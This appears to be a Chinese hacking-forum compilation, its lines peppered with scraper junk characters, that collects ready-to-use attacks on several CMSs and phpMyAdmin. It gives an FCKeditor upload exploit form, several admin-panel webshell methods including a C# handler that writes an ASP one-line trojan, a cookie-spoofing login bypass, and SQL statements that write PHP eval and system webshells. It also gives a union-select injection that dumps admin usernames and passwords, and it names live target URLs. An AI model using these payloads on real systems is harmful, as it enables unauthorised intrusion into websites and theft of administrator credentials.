如果connector.aspx文件被删可用以下exp,copy以下代码另存为html,上传任意文件- q# n, L+ [2 P( _+ u" T( b! `+ t
<form id="frmUpload" enctype="multipart/form-data" action="http://www.xxoo.net/controls/fckeditor/editor/filemanager/upload/aspx/upload.aspx?Type=Media" method="post">9 j1 a! w. q2 ]1 J4 G* ^
Upload a new file:<br>
) F" b# T; C; b% p0 d, \! Y<input type="file" name="NewFile" size="50"><br>( `, W0 L8 O+ p; t# V3 c
<input id="btnUpload" type="submit" value="Upload">
+ k% q7 D; D! [- E3 |3 }0 |' X</form>, F* f! H/ G, d
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------
4 V. w8 K. |& n+ T9 B+ N0 A' ]; ~
SDcms 后台拿webshell
+ x( A! n: H- }/ H" n/ |/ C* q' P2 S. X# Z. c
第一种方法:% r* P6 h) x# u) c
进入后台-->系统管理-->系统设置-->系统设置->网站名称;
" X6 u. ^" H6 }) w# \, N4 y3 B7 k把网站名称内容修改为 "%><%eval request("xxx")' //密码为xxx
5 [: t2 I I4 Y0 B! m/ Y/ V9 |- u用菜刀链接http://www.xxx.com/inc/const.asp 就搞定了。) W2 [- q a) ]# C S" {
第二种方法:
& G3 h4 a, @) e/ X" ]; Q进入后台-->系统管理-->系统设置-->系统设置->上传设置;
& y7 n- g7 ]1 j1 I9 e9 X在文件类型里面添加一个aaspsp的文件类型,然后找一个上传的地方直接上传asp文件! 注:修改文件类型后不能重复点保存!
: U5 p7 \. G# ?0 C4 y, p- T+ d第三种方法:
! U4 j: U) n7 F1 L8 Y) T, [* q进入后台-->界面管理-->模板文件管理-->创建文件0 ^: E! I( ^3 \. s
文件名写入getshell.ashx
2 t: S% K5 @! b' T6 ]7 [内容写入下面内容:+ x9 S8 I8 v, ~
/====================复制下面的=========================/
3 P9 [* Z4 w9 Q3 d2 M<%@ WebHandler Language="C#" Class="Handler" %>1 \7 X3 i$ T) [. o
using System;
, e$ x" [5 n8 O6 L1 q; l. P% Ousing System.Web;* }1 |/ u3 P% M& H
using System.IO;2 @! i+ H, B# ]% y' v& o- C+ I
public class Handler : IHttpHandler {
# N2 N8 t |4 |) ?5 K" E. B2 b6 t3 Lpublic void ProcessRequest (HttpContext context) {
0 r9 [6 d b) ucontext.Response.ContentType = "text/plain";& D( t9 k/ O/ K$ K, k7 }
StreamWriter file1= File.CreateText(context.Server.MapPath("getshell.asp"));. `+ V8 s$ U5 W/ H
file1.Write("<%response.clear:execute request(\"xxx\"):response.End%>");
& p% @3 ?; C* t) \/ D% [: kfile1.Flush();
& K$ |, x1 U( Afile1.Close();6 X5 s* O f# [8 L, C7 z6 W
}
! Y1 F. e5 w _) V+ _! h7 a) d* T, rpublic bool IsReusable {$ B& ^! J# g+ T7 d
get {
! i2 x, r4 v* s1 t" j/ Lreturn false;
8 }5 Y' u' A# ]0 ~5 l" c}+ B9 Y! f( W$ }. R( ^! G) @$ n' j+ V8 r
}
' u3 N$ x: I1 n* S& L8 s}
7 P( x; v( r! U- a0 d/=============================================/
: l) j7 w8 [* v6 ?6 T1 q/ N* l访问这个地址:http://www.xxx.com/skins/2009/getshell.ashx
6 F+ s$ Q( ~( w, Q% c会在http://www.xxx.com/skins/2009/目录下生成getshell.asp 一句话木马 密码为xxx 用菜刀链接2 @1 l% k; D& l1 U& ?/ `5 g
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------' p& _, s/ P, P2 _ K
$ U' K. m/ \- W% @. K% R# ~ESCMS网站管理系统0day
?8 g" w; L9 M9 X7 C7 C
, G+ y: h% y2 i$ c后台登陆验证是通过admin/check.asp实现的
0 U# j3 b/ }$ I+ m7 G/ p5 u5 }/ x. W- P' i @& F. S
首先我们打开http://target.com/admin/es_index.html
" W6 k* @; w6 A0 R! Q5 ~然后在COOKIE结尾加上
c% |. k. t3 C j& a3 L- d+ W; ESCMS$_SP2=ES_admin=st0p;5 F" y& N2 T6 a; b' l
修改,然后刷新" g4 w! m2 Z+ z' n; L
进后台了嘎..
( g$ X* y' l; s4 R- i# b( N然后呢…提权,嘿嘿,admin/up2.asp,上传目录参数filepath过滤不严,导致可截断目录,生成SHELL/ n1 ~$ ^- q. f; f( g
$ [0 ^* P! L& N
利用方法,可以抓包,然后改一下,NC上传,还可以直接用DOMAIN等工具提交.
0 L; p! j/ y- e9 C嘿嘿,成功了,shell地址为http://target.com/admin/diy.asp
$ v: a; }8 N; @3 ^% u, x# F存在这个上传问题的还有admin/downup.asp,不过好像作者的疏忽,没有引用inc/ESCMS_Config.asp,导致打开此页面失败..
0 A7 }' g* U1 Q3 {1 L; M在版本ESCMS V1.0 正式版中,同样存在上传问题admin/up2.asp和admin/downup.asp都可利用,只不过cookies欺骗不能用了
6 W- C" t7 ^ l! _6 P- E3 t------------------------------------------------------------------------------------------------------------------------------------------------------------------------------: `, |' ^+ L: ~- J7 G0 e$ i
" U* e8 Z' H1 Q% D& ~# ~) V; l
宁志网站管理系统后台无验证漏洞及修复
9 x# Z1 I; {' o B7 U6 y& g1 u2 U1 O+ c
! |( J0 w! D$ H. ~; `8 ]网上搜了一下,好像没有发布.如有雷同纯粹巧合!
# {$ @0 z* B8 C# F官方网站:www.ningzhi.net* D7 l6 t. O7 W+ Z4 l f
学校网站管理系统 V.2011版本 ' h0 D9 ]5 j+ I: Q& F" `4 y
http://down.chinaz.com/soft/29943.htm 6 f* Z% Q5 g% ~
其它版本(如:政府版等),自行下载.
v# [- S% o0 |( O7 j漏洞说明:后台所有文件竟然都没有作访问验证...相当无语...竟然用的人还很多.汗~~~
& D! A& _, A9 Q8 t' jlogin.asp代码如下:6 b2 t1 q* d E4 V3 j2 ?: Z0 l
<% response.Write"<script language=javascript>alert('登陆成功!请谨慎操作!谢谢!');this.location.href='manage.asp';</script>" %>
2 ^0 \4 z; W$ B, D: `0 p4 imanage.asp代码我就不帖出来了.反正也没验证.
. K8 N* k% r- g3 g7 P# S只要访问登陆页就可以成功登陆.....蛋疼~~~ 对此本人表示不理解!# b j$ S& Q7 Q3 s" c* u8 ^8 }
漏洞利用:+ e4 N) g# ~ _7 D! Y4 F
直接访问http://www.0855.tv/admin/manage.asp
+ W9 W. y7 H0 R数据库操作:http://www.0855.tv/admin/manage_web.asp?txt=5&id=web5! C- X3 ]/ }$ W
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------1 I5 C. `) C+ l8 b
2 r$ h. ] z! {/ o; Q2 s
phpmyadmin拿shell的四种方法总结及修复
: d0 {1 P" g) \* n' T
3 d$ n5 l/ D" A% w9 Y6 n X方法一:
* ^4 @/ l7 [: A6 g, I. v2 J, Z% x8 tCREATE TABLE `mysql`.`study` (`7on` TEXT NOT NULL );* B/ a2 E6 S/ q, P; b
INSERT INTO `mysql`.`study` (`7on` )VALUES ('<?php @eval($_POST[7on])?>');$ x; {4 W' f. X" {6 h( f6 f6 f
SELECT 7onFROM study INTO OUTFILE 'E:/wamp/www/7.php';
0 y+ Y$ [" \; ]9 y4 g4 }! r" m----以上同时执行,在数据库: mysql 下创建一个表名为:study,字段为7on,导出到E:/wamp/www/7.php- n# w! O6 u1 x2 k9 ^ R4 X9 [
一句话连接密码:7on
/ r& x3 r5 y) k; Q% h; T6 h& S方法二:+ G4 }. M' U' a: k' L6 X/ s: P
读取文件内容: select load_file('E:/xamp/www/s.php');8 a) G2 a" ]/ E6 _
写一句话: select '<?php @eval($_POST[cmd])?>'INTO OUTFILE 'E:/xamp/www/study.php'
: z. h& n1 u8 `cmd执行权限: select '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/study.php', E# c: N, Z/ R% `" A
方法三:
9 Z% [3 ^! c$ C5 m" }3 ^0 t- j9 CJhackJ版本 PHPmyadmin拿shell
' _- \5 O! F% d# G+ TCreate TABLE study (cmd text NOT NULL);
# G1 U$ M g$ C7 vInsert INTO study (cmd) VALUES('<?php eval($_POST[cmd])?>');& D I A$ v! R: o
select cmd from study into outfile 'E:/wamp/www/7.php';, J1 H {3 K7 }' N
Drop TABLE IF EXISTS study;
) s# G5 V7 R6 }7 f U: J; g<?php eval($_POST[cmd])?>
D+ b$ ?5 Q# OCREATE TABLE study(cmd text NOT NULL );# MySQL 返回的查询结果为空(即零行)。: P' B4 w' {! H+ |/ z
INSERT INTO study( cmd ) VALUES ('<?php eval($_POST[cmd])?>');# 影响列数: 1
! W3 a: D# X, T! L5 ^SELECT cmdFROM study INTO OUTFILE 'E:/wamp/www/7.php';# 影响列数: 1
. e0 O1 M, u8 n! ~DROP TABLE IF EXISTS study;# MySQL 返回的查询结果为空(即零行)。& t) O0 O: R' M+ s9 Z/ I
方法四:; C0 e! Y; k% P, C, n
select load_file('E:/xamp/www/study.php');
0 U' V7 d) {, r6 O3 b' s+ Q0 ]select '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/study.php'$ ^5 q$ e1 i$ V. v2 z
然后访问网站目录:http://www.2cto.com/study.php?cmd=dir! H( c# i) I/ W- e$ w; B
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------/ c9 `- i$ R& X; G8 G
) I; J U$ f8 Q9 s
NO.001中学网站管理系统 Build 110628 注入漏洞
& y9 _# i6 f) g/ m
& G& n. x9 z% T$ `5 CNO.001中学网站管理系统功能模块:! [0 j v1 S3 |: g. L
1.管理员资料:网站的基本信息设置(校长邮箱等),数据库备份,用户管理、部门及权限管理等
) i! f6 @: C% _0 o4 {2.学校简介:一级分类,可以添加校园简介,领导致辞、校园风光、联系我们。。。等信息
) S. C; S6 F7 W1 f D& Y3.文章管理:二级分类,动态添加各相关频道(图片视频频道、学校概况频道除外)文章等信息
, x- f. Y% R7 u0 V& M R$ S4.视频图片管理:一级分类,动态添加视频或者图片等信息* \2 V8 ^3 j/ e2 k
5.留言管理:对留言,修改,删除、回复等管理6 n: X9 ^" ~5 I2 Y% ?5 n
6.校友频道:包括校友资料excel导出、管理等功能* q T# @) x5 @! v) I- H
7.友情链接管理:二级分类,能建立不同种类的友情链接显示在首页/ s& L9 m2 w6 H. i; m
默认后台:admin/login.asp D) \/ R6 F! w1 Y2 ~
官方演示:http://demo.001cms.net
$ h; D1 Q# g4 Y$ T! [源码下载地址:http://down.chinaz.com/soft/30187.htm
2 \$ T/ s! h2 s2 k! R- i6 q7 SEXP:$ S% i. x# R4 F" U; L6 ]
union select 1,2,3,a_name,5,6,a_pass,8,9,10,11 from admin
8 R6 u# W Y U( T; H6 H$ U测试:http://demo.001cms.net/shownews.asp?type=新闻动态&stype=校务公开&id=484 union select 1,2,3,a_name,5,6,a_pass,8,9,10,11 from admin
- b' m/ @: q1 [' tgetshell:后台有备份,你懂的
6 _" e, P0 x1 p另:FCK编辑器有几处可利用.大家自己行挖掘,由于相关内容较多,我在这里就不说了。0 d, r+ p+ `$ g* A& X- r
------------------------------------------------------------------------------------------------------------------------------------------------------------------------- |